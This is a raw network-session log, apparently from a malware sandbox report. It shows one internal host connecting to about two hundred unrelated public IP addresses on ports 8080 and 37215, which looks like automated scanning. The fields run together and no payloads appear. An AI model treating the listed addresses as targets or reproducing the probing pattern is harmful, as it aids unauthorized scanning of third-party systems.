                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31687192.168.2.2344390170.222.84.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31688192.168.2.2346636208.116.108.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31689192.168.2.2344930195.103.219.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31690192.168.2.2338924141.29.61.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31691192.168.2.2336682144.69.173.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31692192.168.2.2360074165.144.199.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31693192.168.2.233873031.155.48.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31694192.168.2.2352190156.114.73.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31695192.168.2.2351204151.9.137.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31696192.168.2.2352820101.230.128.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31697192.168.2.2352710165.228.90.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31698192.168.2.235203648.160.120.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31699192.168.2.233452612.20.243.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31700192.168.2.2360478115.40.105.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31701192.168.2.233416269.52.86.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31702192.168.2.2358346124.217.64.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31703192.168.2.235678484.6.142.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31704192.168.2.233947666.252.194.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31705192.168.2.2336020199.237.247.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31706192.168.2.2334384130.107.11.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31707192.168.2.2335836140.183.73.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31708192.168.2.233535065.142.79.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31709192.168.2.2355372222.198.154.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31710192.168.2.233964034.164.71.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31711192.168.2.2349000188.189.54.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31712192.168.2.2338760172.184.42.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31713192.168.2.2334138166.137.125.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31714192.168.2.234757097.142.129.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31715192.168.2.2335168133.163.203.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31716192.168.2.2346018222.243.197.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31717192.168.2.2333286218.164.21.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31718192.168.2.2344976198.53.140.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31719192.168.2.2337684118.199.218.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31720192.168.2.2345234188.70.208.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31721192.168.2.2360508180.109.31.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31722192.168.2.2346636132.125.17.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31723192.168.2.2358104108.243.96.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31724192.168.2.2332950202.103.118.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31725192.168.2.2347160119.3.241.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31726192.168.2.2358886141.229.108.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31727192.168.2.2337794199.20.64.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31728192.168.2.234258423.206.128.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31729192.168.2.233620291.80.223.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31730192.168.2.2358926177.97.233.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31731192.168.2.235158864.211.134.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31732192.168.2.2355392182.190.142.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31733192.168.2.234280899.139.117.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31734192.168.2.233450490.130.69.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31735192.168.2.234340827.52.124.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31736192.168.2.2357636113.203.3.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31737192.168.2.2347364103.231.13.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31738192.168.2.2356912166.81.20.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31739192.168.2.2340248149.224.121.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31740192.168.2.2342316113.61.206.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31741192.168.2.2358610115.80.164.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31742192.168.2.2356070172.84.245.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31743192.168.2.2355480111.245.74.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31744192.168.2.2341760197.79.39.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31745192.168.2.2340888177.191.251.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31746192.168.2.2339528190.26.135.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31747192.168.2.2338360202.156.64.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31748192.168.2.2353520219.74.82.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31749192.168.2.2356918102.43.246.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31750192.168.2.235314096.173.32.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31751192.168.2.2340682151.21.195.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31752192.168.2.233817492.153.250.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31753192.168.2.2350826190.112.44.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31754192.168.2.2350234137.234.65.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31755192.168.2.2360448164.240.249.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31756192.168.2.235697696.218.236.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31757192.168.2.2345374170.48.7.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31758192.168.2.2336646132.92.174.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31759192.168.2.234363219.122.106.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31760192.168.2.2348454171.248.30.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31761192.168.2.234154291.254.130.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31762192.168.2.2355314108.138.213.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31763192.168.2.2340812148.151.74.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31764192.168.2.2342430199.201.23.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31765192.168.2.2334642135.222.19.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31766192.168.2.235380827.73.80.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31767192.168.2.2343918155.128.45.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31768192.168.2.235130246.35.202.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31769192.168.2.233732496.252.225.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31770192.168.2.2341538185.18.13.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31771192.168.2.2338582193.246.56.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31772192.168.2.2338020107.89.131.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31773192.168.2.2352906112.222.226.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31774192.168.2.234412076.225.126.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31775192.168.2.2333688124.215.173.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31776192.168.2.2356122177.180.164.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31777192.168.2.2347960163.210.176.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31778192.168.2.2345320116.207.68.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31779192.168.2.2344792121.102.233.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31780192.168.2.234971284.144.213.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31781192.168.2.2359588122.191.234.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31782192.168.2.2356420131.58.90.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31783192.168.2.2358004209.254.175.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31784192.168.2.234383242.112.49.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31785192.168.2.2353904182.153.144.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31786192.168.2.235420665.6.148.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31787192.168.2.2338826148.197.173.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31788192.168.2.234141262.155.96.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31789192.168.2.2335342111.153.218.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31790192.168.2.2333272170.251.95.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31791192.168.2.2355798197.77.124.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31792192.168.2.2359814157.86.113.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31793192.168.2.2351584157.167.128.5337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31794192.168.2.2333436197.207.59.11737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31795192.168.2.235464441.91.112.14137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31796192.168.2.2337900157.42.81.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31797192.168.2.2335726197.38.172.10437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31798192.168.2.235094641.20.188.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31799192.168.2.2351236197.156.100.18437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31800192.168.2.2354278157.227.75.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31801192.168.2.2339666216.195.137.16837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31802192.168.2.2359690197.150.3.3237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31803192.168.2.2349196157.29.123.13937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31804192.168.2.235125241.83.169.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31805192.168.2.2349382106.222.150.5437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31806192.168.2.2348218157.141.212.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31807192.168.2.235316641.60.123.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31808192.168.2.2348168197.19.206.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31809192.168.2.2346924197.186.4.22837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31810192.168.2.2360988197.248.67.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31811192.168.2.235110888.245.126.6337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31812192.168.2.2338496197.66.134.5137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31813192.168.2.2356312157.71.125.13837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31814192.168.2.2347818157.234.75.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31815192.168.2.2358184157.85.159.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31816192.168.2.233711241.192.221.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31817192.168.2.235913896.248.0.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31818192.168.2.235161649.185.237.19137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31819192.168.2.2360942157.6.6.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31820192.168.2.233974641.99.156.9037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31821192.168.2.2345802157.170.103.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31822192.168.2.2360640159.40.225.5137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31823192.168.2.2354704197.213.144.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31824192.168.2.2333834157.245.254.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31825192.168.2.2344420188.254.48.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31826192.168.2.233361241.150.223.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31827192.168.2.2338454157.206.77.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31828192.168.2.2353400197.141.124.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31829192.168.2.2345134197.5.63.10937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31830192.168.2.2346006197.251.46.22237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31831192.168.2.2335020126.141.171.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31832192.168.2.2358718197.146.183.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31833192.168.2.235789220.48.65.5537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31834192.168.2.2338020157.12.11.3737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31835192.168.2.234749641.191.230.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31836192.168.2.2358244157.88.63.5237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31837192.168.2.2342578197.178.114.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31838192.168.2.2336190197.37.144.20137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31839192.168.2.2350292195.75.92.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31840192.168.2.2341676157.16.60.3137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31841192.168.2.236091441.230.147.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31842192.168.2.234082441.78.62.6337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31843192.168.2.2337654157.76.188.18637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31844192.168.2.2359254155.46.28.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31845192.168.2.233874841.83.42.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31846192.168.2.234173441.42.202.18737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31847192.168.2.2342830197.80.40.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31848192.168.2.2340506197.115.243.16437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31849192.168.2.2332786204.72.43.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31850192.168.2.234009477.108.156.19137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31851192.168.2.2355882157.231.158.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31852192.168.2.2343590157.136.165.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31853192.168.2.233816041.177.66.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31854192.168.2.23544169.223.177.15937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31855192.168.2.234163041.148.211.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31856192.168.2.2343290197.123.7.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31857192.168.2.234593639.218.13.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31858192.168.2.2338784197.239.66.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31859192.168.2.2356212157.45.245.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31860192.168.2.235117841.83.2.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31861192.168.2.2340162157.182.0.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31862192.168.2.2346692197.233.46.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31863192.168.2.235728841.149.78.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31864192.168.2.234809841.28.29.3737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31865192.168.2.2335506197.125.238.24237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31866192.168.2.2334028197.56.24.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31867192.168.2.234390441.225.120.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31868192.168.2.23352444.128.141.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31869192.168.2.2351320135.202.213.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31870192.168.2.2357400157.160.158.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31871192.168.2.235119041.65.130.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31872192.168.2.2337766197.75.152.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31873192.168.2.2342690197.30.2.3837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31874192.168.2.2335424157.75.204.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31875192.168.2.235097241.2.192.24737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31876192.168.2.2359224157.210.218.3537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31877192.168.2.2356782157.72.248.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31878192.168.2.2339536118.157.192.14037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31879192.168.2.234680884.191.125.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31880192.168.2.2333104197.166.2.24237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31881192.168.2.2334408157.133.209.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31882192.168.2.235366241.103.205.10537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31883192.168.2.234032041.223.85.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31884192.168.2.2354536197.232.166.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31885192.168.2.2333590197.212.210.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31886192.168.2.2333714197.29.139.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31887192.168.2.2338346197.37.92.19037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31888192.168.2.2354236197.217.172.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31889192.168.2.2346018197.193.250.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31890192.168.2.2354142137.118.134.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31891192.168.2.236050241.186.155.19137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31892192.168.2.233662041.176.146.3537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31893192.168.2.2355322197.12.128.13437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31894192.168.2.2337316157.89.96.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31895192.168.2.2343600197.201.249.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31896192.168.2.2332808212.188.254.25237215
